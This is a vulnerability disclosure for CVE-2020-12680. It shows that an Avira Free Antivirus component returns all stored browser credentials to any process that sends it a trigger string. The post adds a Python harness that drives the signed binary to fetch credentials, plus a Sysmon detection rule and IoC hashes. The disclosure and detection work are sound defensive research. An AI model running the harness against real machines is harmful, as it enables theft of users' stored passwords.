Avira Free Antivirus password collector


What if I told you that the only job of one of the components of Avira Free Antivirus is to collect your browser passwords and print them to the console?

Investigation

There is a company called Avira GmbH & Co. KG. The company makes various information security solutions for home and business.
One of the components of Avira Free Antivirus, one that is not mentioned in the product description, is capable of collecting the user's stored credentials.
Let's check the file "%ProgramFiles%\Avira\Launcher\Avira.PWM.NativeMessaging.exe". The binary is written for the .NET platform and is not obfuscated, so let's open it in dnSpy and check what it does.
"Avira.PWM.NativeMessaging.exe" is a console program that reads input and performs actions based on it.
The "Read" function retrieves the input from the stdin stream and passes it to the "ProcessMessage" function. If the input is "fetchChromePasswords" or "fetchCredentials", it calls the "RetrievBrowserCredentials" function.

The "RetrievBrowserCredentials" function collects all of the user's stored credentials from a set of browsers (Chrome, Firefox, Opera, Edge) and stores them in a JSON object.

It then prints the JSON string to stdout.
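The interaction described above can be checked on a test machine with the following Python harness. It is an added example, not code from the post or from Avira: it starts the binary, hands it one trigger string on stdin and summarises the JSON that comes back without writing any secret to disk. Assumptions, labelled in the code: the install path is the one quoted above; the host accepts the trigger as a plain line (the post only says it reads stdin), and if it instead expects Chrome's native-messaging framing, a 4-byte little-endian length prefix, pass framed=True; the JSON layout is assumed to be one top-level key per browser, so the summary only counts entries. The stub host used for the self-test is constructed and returns made-up data.

```python
import json
import struct
import subprocess
import sys
from typing import Any, Dict, List

# Hypothetical install path taken from the post; adjust to the machine under test.
COLLECTOR = r"C:\Program Files\Avira\Launcher\Avira.PWM.NativeMessaging.exe"
# The two trigger strings named in the post.
COMMANDS = ("fetchCredentials", "fetchChromePasswords")


def frame_native_message(text: str) -> bytes:
    """Encode a message the way Chrome native messaging does: a 4-byte little-endian
    length followed by the UTF-8 JSON body. Assumption: only needed if the host reads
    framed messages rather than a plain line (the post only says it reads stdin)."""
    body = json.dumps(text).encode("utf-8")
    return struct.pack("<I", len(body)) + body


def extract_json(stdout: bytes, framed: bool) -> Dict[str, Any]:
    """Pull the first JSON object out of whatever the host wrote to stdout,
    tolerating a native-messaging length prefix and trailing console noise."""
    if framed and len(stdout) >= 4:
        (n,) = struct.unpack("<I", stdout[:4])
        stdout = stdout[4:4 + n]
    text = stdout.decode("utf-8", errors="replace")
    start = text.find("{")
    if start < 0:
        raise RuntimeError("no JSON object on stdout: %r" % text[:200])
    obj, _ = json.JSONDecoder().raw_decode(text, start)
    return obj


def query_collector(argv: List[str], message: str = COMMANDS[0], framed: bool = False,
                    timeout: float = 30.0) -> Dict[str, Any]:
    """Start the collector (argv lets a stub stand in for the real binary), hand it
    one message on stdin and return the parsed JSON it prints."""
    payload = frame_native_message(message) if framed else (message + "\n").encode("utf-8")
    proc = subprocess.run(argv, input=payload, capture_output=True, timeout=timeout)
    return extract_json(proc.stdout, framed)


def summarize(blob: Dict[str, Any]) -> Dict[str, int]:
    """Report how many entries came back per top-level key (assumed: one key per
    browser holding a list) so the secrets themselves are never printed or stored."""
    return {k: (len(v) if isinstance(v, (list, dict)) else 1) for k, v in blob.items()}


# Constructed stand-in for the real host, used for the self-test below: it answers the
# two trigger strings with fake credentials and anything else with an empty object.
STUB_SCRIPT = (
    "import sys, json\n"
    "msg = sys.stdin.readline().strip()\n"
    "fake = {'chrome': [{'url': 'https://one.example', 'user': 'alice', 'pass': 'x'},\n"
    "                   {'url': 'https://two.example', 'user': 'bob', 'pass': 'y'}],\n"
    "        'firefox': [{'url': 'https://three.example', 'user': 'carol', 'pass': 'z'}]}\n"
    "print(json.dumps(fake) if msg in ('fetchCredentials', 'fetchChromePasswords') else '{}')\n"
)
STUB_ARGV = [sys.executable, "-c", STUB_SCRIPT]


if __name__ == "__main__":
    # Pass the real path as the first argument to run against the installed binary.
    target = sys.argv[1:2] or STUB_ARGV
    print(summarize(query_collector(target)))
```

Run it with no arguments to exercise the stub; run it with the path to the installed binary to reproduce the post's claim. Only counts are printed, which is enough to confirm that a process with no relationship to any browser receives the credential store on stdout.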


The problem

  • The binary collects the user's stored browser credentials.
  • The binary carries Avira's digital signature, so it passes code-signing checks and application allowlists.
  • The binary does not verify which program calls it: anything that can start a process and read its stdout gets the credentials.
  • The binary is a standalone program: it runs without the rest of the product.
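Because the host can be started by any process, the useful detection is a process-creation rule rather than a hash match alone. Below is an added Python example, not code from the post, run over constructed Sysmon Event ID 1 style records. The allowlisted parent names are an assumption based on the browsers named above and on Avira's install directory; the IoC hashes are the ones the post lists, and the second one is only 39 hex digits as printed, so the format check drops it rather than letting a value that can never match sit in the rule.

```python
import re
from typing import Dict, List, Tuple

# SHA1 values as printed in the IoC section of the post.
IOC_SHA1 = [
    "13c95241e671b98342dba51741fd02621768ecd5",
    "d43ee0d99c36b782a909884fc4f18a553e5b94b",
    "3a6bd77f734da9cdeb7fb8da69a12be1445b2183",
]
SHA1_RE = re.compile(r"^[0-9a-f]{40}$")
# Keep only well-formed hashes; a 39-digit string can never match a real SHA1 field.
KNOWN_BAD = {h.lower() for h in IOC_SHA1 if SHA1_RE.match(h.lower())}

TARGET_IMAGE = "avira.pwm.nativemessaging.exe"
# Assumption: a native-messaging host is normally started by the browser it serves;
# these are the browsers the post names. Anything else spawning it is worth a look.
EXPECTED_PARENTS = {"chrome.exe", "firefox.exe", "opera.exe", "msedge.exe"}
# Assumption: Avira's own components live under this directory.
AVIRA_DIR = "c:\\program files\\avira\\"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_hashes(field: str) -> Dict[str, str]:
    """Sysmon's Hashes field looks like 'SHA1=...,MD5=...'; return lowercase values by algorithm."""
    out: Dict[str, str] = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons a single process-creation event should alert (empty if none)."""
    reasons: List[str] = []
    sha1 = parse_hashes(event.get("Hashes", "")).get("SHA1")
    if sha1 in KNOWN_BAD:
        reasons.append("image matches IoC SHA1 " + sha1)
    if basename(event.get("Image", "")) == TARGET_IMAGE:
        parent = event.get("ParentImage", "")
        if basename(parent) not in EXPECTED_PARENTS and not parent.lower().startswith(AVIRA_DIR):
            reasons.append("credential collector started by unexpected parent " + (parent or "<unknown>"))
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed records; every hash other than the IoC values is made up.
SAMPLE_EVENTS = [
    {   # 0: Chrome starting its native-messaging host, the expected shape
        "Image": r"C:\Program Files\Avira\Launcher\Avira.PWM.NativeMessaging.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Hashes": "SHA1=" + "a" * 40,
    },
    {   # 1: the same signed binary driven from a shell
        "Image": r"C:\Program Files\Avira\Launcher\Avira.PWM.NativeMessaging.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Hashes": "SHA1=" + "a" * 40,
    },
    {   # 2: a renamed copy of an IoC build dropped in a writable directory
        "Image": r"C:\Users\Public\svc.exe",
        "ParentImage": r"C:\Users\Public\loader.exe",
        "Hashes": "SHA1=13c95241e671b98342dba51741fd02621768ecd5,MD5=" + "0" * 32,
    },
    {   # 3: unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Hashes": "SHA1=" + "b" * 40,
    },
]

if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The parent allowlist is name-based, which an attacker can beat by spoofing the parent PID or by naming a dropper chrome.exe, so in production compare the parent's full path and signature as well, and treat the hash list as a supplement: a fresh signed build of the same host will not match any IoC but still hands over the credentials.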

IoC

SHA1: 13c95241e671b98342dba51741fd02621768ecd5
SHA1: d43ee0d99c36b782a909884fc4f18a553e5b94b
SHA1: 3a6bd77f734da9cdeb7fb8da69a12be1445b2183
  
CVE-2020-12680

Timeline

07.04.2020: The problem was reported to support@avira.com and info@avira.com
06.05.2020: No response from Avira. Full disclosure.

Thanks

Translation from Russian by Pavel Maksyutin.
Thanks to https://twitter.com/malwrhunterteam for looking for other versions.
